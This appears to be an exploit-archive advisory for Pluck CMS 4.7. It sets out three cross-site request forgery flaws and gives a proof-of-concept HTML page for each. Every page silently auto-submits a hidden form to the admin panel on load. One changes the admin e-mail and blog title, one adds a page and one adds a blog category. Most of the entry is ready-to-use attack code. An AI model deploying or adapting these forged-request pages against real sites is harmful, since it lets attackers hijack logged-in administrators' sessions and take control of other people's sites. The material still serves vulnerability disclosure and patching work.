Pluck CMS 4.7 Multiple CSRF Vulnerabilities
2012-02-09 14:15:03# Exploit Title: Pluck cms multiple vulnerabilit�
# Date: 09/01/2012
# Author: Gordon Security
# Vendor or Software Link: www.pluck-cms.org
# Version: 4.7
# Category: webapps
# Website:www.gordon-security.blogspot.com
C.S.R.F. #1
#[p.o.c.] Change admin e-mail and change title blog<html><title>Download</title><body
onload="javascript:document.
forms[0].submit()"><H3>www.gordon-security.blogspot.com</H3><H2>CSRF Exploit to change Admin E-mail and Blog Title</H2><form
method="POST" name="form0" action="
http://127.0.0.1:80/pluck/admin.php?action=settings<http://127.0.0.1/pluck/admin.php?action=settings> "> <input
type="hidden" name="cont1" value="Gordon Security"/> <input
type="hidden" name="cont2" value="[email protected]"/> <input
type="hidden" name="save" value="Salva"/></form></body></html> C.S.R.F. #2
#[p.o.c.] Add page to blog<html><title>Gordon Security</title><body
onload="javascript:document.forms[0].submit()"><H3>www.gordon-security.blogspot.com</H3><H2>CSRF Exploit to add page</H2><form
method="POST" name="form0" action="
http://127.0.0.1:80/pluck/admin.php?action=editpage<http://127.0.0.1/pluck/admin.php?action=editpage> "> <input
type="hidden" name="title" value="Exploit"/> <input
type="hidden" name="content" value="<p>Exploited</p>"/> <input
type="hidden" name="description" value=""/> <input
type="hidden" name="keywords" value=""/> <input
type="hidden" name="hidden" value="no"/> <input
type="hidden" name="sub_page" value=""/> <input
type="hidden" name="theme" value="default"/> <input
type="hidden" name="save_exit" value="Save and Exit"/></form></body></html> C.S.R.F #3
#[p.o.c.] Add categorie<html><title>Gordon Security</title><body
onload="javascript:document.forms[0].submit()"><H3>www.gordon-security.blogspot.com</H3><H2>CSRF Exploit to add categorie</H2><form
method="POST" name="form0" action="
http://127.0.0.1:80/pluck/admin.php?module=blog<http://127.0.0.1/pluck/admin.php?module=blog> "> <input
type="hidden" name="cont1" value="Hacking"/> <input
type="hidden" name="Submit" value="Salva"/></form></body></html>
<!-- Dynamic page generated in 0.107 seconds. -->
<!-- Cached page generated by WP-Super-Cache on 2012-02-09 12:42:00 -->
<!-- Compression = gzip -->
Fixes
No fixesIn order to submit a new fix you need to be registered.